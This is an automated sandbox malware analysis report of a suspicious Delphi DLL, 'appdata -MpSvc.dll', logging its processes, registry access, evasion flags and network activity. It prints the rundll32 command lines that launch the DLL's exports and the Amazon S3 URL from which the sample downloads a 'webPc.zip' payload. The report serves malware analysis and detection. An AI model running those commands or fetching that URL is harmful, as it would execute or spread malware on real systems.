Windows Analysis Report
appdata -MpSvc.dll

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /webPc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_044A5DCC Sleep,URLDownloadToFileW,Sleep,

11_2_044A5DCC

Source: global traffic

Source: unknown

DNS traffic detected: queries for: awsserver903203232.s3.sa-east-1.amazonaws.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Foundx-amz-request-id: JQ346M807WVPWYMHx-amz-id-2: ubI19FHlsDANi844u/osa9nS0voFgAhnlpZkMXatCQY+d7AXA0hWTnpaTCetmm4Ks7R6rUzJcgPtz154jSO2GQ1ODHJiSjvEContent-Type: application/xmlTransfer-Encoding: chunkedDate: Fri, 08 Mar 2024 18:43:14 GMTServer: AmazonS3Connection: close

Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: rundll32.exe	String found in binary or memory: http://www.delphiforfun.org/
Source: rundll32.exe, 00000005.00000002.2149493533.0000000000B5C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2286542223.000000000427C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.3365361806.000000000041C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.2231907043.000000000041C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2233331173.000000000447C000.00000020.00000001.01000000.00000003.sdmp, appdata -MpSvc.dll	String found in binary or memory: http://www.delphiforfun.org/openU
Source: rundll32.exe, 0000000B.00000002.2285349012.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/.
Source: rundll32.exe, 0000000B.00000002.2285349012.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/r
Source: rundll32.exe, 0000000B.00000002.2285349012.0000000000792000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2285726482.0000000000C78000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2285349012.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip
Source: rundll32.exe, 0000000B.00000002.2285349012.000000000077F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip5pV
Source: rundll32.exe, 0000000B.00000002.2285349012.0000000000792000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipC
Source: rundll32.exe, 0000000B.00000002.2285349012.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipx
Source: rundll32.exe, 0000000B.00000002.2285349012.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown

HTTPS traffic detected: 3.5.233.174:443 -> 192.168.2.6:49717 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B4CB04	5_2_00B4CB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04387220	11_2_04387220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04386F60	11_2_04386F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0426CB04	11_2_0426CB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00527220	12_2_00527220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0040CB04	12_2_0040CB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00526F60	12_2_00526F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0040CB04	13_2_0040CB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0446CB04	14_2_0446CB04

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0041144C appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0040D3A4 appears 32 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 692

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: appdata -MpSvc.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal72.evad.winDLL@26/17@1/1

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Program Files (x86)\Microsoft.NET\base

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4440
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1336
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6836
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5348

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2091f8dc-3b5d-4824-8d89-9a9b6d98f3ed

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck

Source: appdata -MpSvc.dll

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 692
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 684
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 684
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 2140
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Source: C:\Windows\SysWOW64\rundll32.exe

Window found: window name: TMainForm

Found evasive API chain checking for user administrative privileges

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: appdata -MpSvc.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: appdata -MpSvc.dll

Static file information: File size 26239902 > 1048576

Source: appdata -MpSvc.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x24d400

Source: appdata -MpSvc.dll

Static PE information: More than 200 imports for user32.dll

Source: appdata -MpSvc.dll

Static PE information: section name: .didata

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B81198 push ecx; mov dword ptr [esp], eax	5_2_00B81199
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00C152B4 push ecx; mov dword ptr [esp], edx	5_2_00C152B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B65A38 push ecx; mov dword ptr [esp], ecx	5_2_00B65A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B51270 push 00B512F3h; ret	5_2_00B512EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50BA0 push ecx; mov dword ptr [esp], edx	5_2_00B50BA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50BC2 push ecx; mov dword ptr [esp], edx	5_2_00B50BC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50B34 push ecx; mov dword ptr [esp], edx	5_2_00B50B35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50B28 push ecx; mov dword ptr [esp], edx	5_2_00B50B29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50B1C push ecx; mov dword ptr [esp], edx	5_2_00B50B1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50B7A push ecx; mov dword ptr [esp], edx	5_2_00B50B7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B47368 push ecx; mov dword ptr [esp], eax	5_2_00B47369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50CB4 push ecx; mov dword ptr [esp], edx	5_2_00B50CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50CCC push ecx; mov dword ptr [esp], edx	5_2_00B50CCD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B7E5B4 push ecx; mov dword ptr [esp], eax	5_2_00B7E5B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B50504 push ecx; mov dword ptr [esp], edx	5_2_00B50505
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B66EF4 push ecx; mov dword ptr [esp], ecx	5_2_00B66EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04270504 push ecx; mov dword ptr [esp], edx	11_2_04270505
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0429E5B4 push ecx; mov dword ptr [esp], eax	11_2_0429E5B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0435D588 push ecx; mov dword ptr [esp], eax	11_2_0435D58A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_042A1198 push ecx; mov dword ptr [esp], eax	11_2_042A1199
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04271270 push 042712F3h; ret	11_2_042712EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0435D250 push ecx; mov dword ptr [esp], eax	11_2_0435D254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_043352B4 push ecx; mov dword ptr [esp], edx	11_2_043352B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04267368 push ecx; mov dword ptr [esp], eax	11_2_04267369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04270CB4 push ecx; mov dword ptr [esp], edx	11_2_04270CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04270CCC push ecx; mov dword ptr [esp], edx	11_2_04270CCD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04286EF4 push ecx; mov dword ptr [esp], ecx	11_2_04286EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04286F30 push ecx; mov dword ptr [esp], ecx	11_2_04286F34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_044A58E8 push 044A592Eh; ret	11_2_044A5926
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04285A38 push ecx; mov dword ptr [esp], ecx	11_2_04285A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04270B28 push ecx; mov dword ptr [esp], edx	11_2_04270B29

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00D2A8FC IsIconic,	5_2_00D2A8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00D2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	5_2_00D2A980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0444A8FC IsIconic,	11_2_0444A8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0444A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	11_2_0444A980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_005EA8FC IsIconic,	12_2_005EA8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_005EA980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	12_2_005EA980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_005EA8FC IsIconic,	13_2_005EA8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_005EA980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	13_2_005EA980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0464A8FC IsIconic,	14_2_0464A8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0464A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	14_2_0464A980

Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
